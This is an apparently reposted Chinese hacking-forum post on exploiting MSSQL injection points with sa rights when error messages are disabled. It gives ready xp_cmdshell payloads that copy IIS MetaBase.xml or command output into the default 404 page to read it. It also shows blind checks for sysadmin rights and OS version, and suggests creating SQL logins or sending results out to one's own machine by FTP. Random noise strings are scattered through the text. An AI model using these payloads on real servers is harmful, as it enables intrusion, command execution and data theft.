遇到一个sa注入点,mssql错误提示关闭无疑shi让人郁闷的事情。
8 K$ l% ]$ E% [( m
% a6 E" S# Q9 P$ j( Y" _. t; D" l 虽然错误提示关闭也shi可能以列目录,执行命令,但shishi多少就有些不方便。阿D就可能以在错误提示关闭的情况下列目录。7 f3 G0 F1 H1 J/ q; h7 ?$ N
3 {/ y' Q( J$ o/ S 这里有一个很好的方法,让你得到web目录路径,让你得到服务器上的文件,让你执行命令得到回显。
; K' X3 ~9 V2 t5 X
9 o) _% [" ]% d6 Z6 S1 C* ~# n0 } IIS,404页面的默认路径shi C:\Windows\Help\iisHelp\common\404b.htm
5 {3 r7 M8 k1 l+ r0 E: E/ ^& L" T, o8 ^7 J ~
得到web路径exec master..xp_cmdshell ’copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm’--
/ |/ y5 R4 T7 @+ j0 ^( B {) j# L; o- j+ P; v* A ?
,这shi20003,如果是2000的话,exec master..xp_cmdshell ’copy C:\Winnt\system32 \inetsrv\MetaBase.xml C:\Winnts\Help\iisHelp\common\404b.htm’--,在 MetaBase.xml存着IIS的很多信息。执行上面的语句之后,你再访问一下网站一个不存在的文件或目录,显示的就shiMetaBase.xml 的内容了。! h/ k, p2 G8 l+ `1 y# c& J
8 @2 n& c; R- C. G U 执行命令得到回显
2 Y0 s" @1 s# {% Y
- b5 |: f2 v, f9 g# b 通过上面得到web路径的方法,你肯定很容易想到怎么得到回显了吧。 2003,exec master..xp_cmdshell ’ver >C:\Windows\Help\iisHelp\common \404b.htm’--如果是2000,exec master..xp_cmdshell ’ver >C:\Winnt\Help \iisHelp\common\404b.htm’--
p( A) ?; j* x* s A
6 j; N5 L2 \3 L+ H/ F) Y7 m 得到文件也shi相同,把文件copy到404b.htm就行了
. z" z" ^ O1 L8 d8 @3 v! Q \2 S$ j: U; g. j
by 28ice, 2008/6/266 T8 K/ k/ _7 G; D; |; B( E2 r8 p
- Q: A5 m! ]/ v8 @+ t 摘自 28度的冰1 T$ ?1 A% N$ K% q1 j9 {, k
8 d4 I3 W9 @ h' R 盲注判断权限和操作系统版本$ \9 @3 `' }. a/ v
; B% _6 R- Q9 J6 V) R# O
首先第一个问题,如果错误提示关闭,怎么判断当前的权限shi否为sysadmin呢?' V% ~" K) }! J6 r
5 q* x$ G0 z! j9 W/ x% N" H
最简单的,可能以用这样的方法:
8 U! t0 B3 z9 r/ Q- s Y7 d0 G; I8 v, _- B7 o3 q2 P
1=(select IS_SRVROLEMEMBER(’sysadmin’))6 s* K% n0 h' U- [
' n- F7 A/ }8 c
当然,有些情况下,这个方法并不奏效。" z. S! Q, l1 K j) t1 Z) n% c
% L; M2 x$ S0 U
既然shisa,我们就可能以通过执行命令判断,不过,既然错误提示关闭,那么执行的结果就很不容易拿到。
3 O! x2 k. Q# V5 l% n7 `, O6 Y4 j/ ^% l0 b; `8 K
有个3办法可能以解决这个问题
) t' Q! F; }$ [$ f' T
8 |- Z8 a! b0 `+ Q3 W! W7 q a.把执行结果写到404b.htm,具体请看我的上一篇文章( f5 a6 d- m" G1 E# `6 o$ |8 t
, r. t9 H4 j* `, @4 q
b.执行ping 127.1 -n 10,看看页面shi否延迟10秒钟; ^! }0 ~. B3 o' ~9 D. F
: u0 E- D$ D W$ x; I% J c.如果1433端口可能以连接,那干脆新建个sql登录/ m0 }& r! L" O' v2 |2 B$ F* U) F
& x6 S0 y3 s/ u8 t8 j( j( b d.如果大牛你shi公网Ip,openrowset,或者直接telnet,ftp到你自己的机子,说到这里,ftp还有别的用处,比如,把执行结果写到文件中,然后通过ftp传到你的机子上,这何尝不shi获得执行结果的一个好办法。当然,你可能能要用到ftp的-s参数2 ?; @7 C, t5 U: A7 p; b. ~( q; ?
7 N' I1 Z8 b# c/ Z, ~ 还有一个问题,怎么判断系统shi2000还shi2003?当然指的shi错误提示关闭的情况下
: E4 o* A$ Y2 @# [. r2 T- }( L }& a5 n" P; U
很简单
- G/ f! a2 ~6 t6 Y* G5 R5 @0 I% v% ~4 E: l i* L0 ^3 o
执行systeminfo
9 p( ^( D4 b9 }8 y% @% S3 }8 ~4 S
* d+ T( _0 P5 c4 j 在xp/2003下才有这个命令,这个命令执行大概需要5秒钟时间。如果页面延迟5秒,就可能以进一步断定这shi2003(当然不排除2008的可能能性)。 |
发表于 2012-9-15 14:15:42
收藏
支持
反对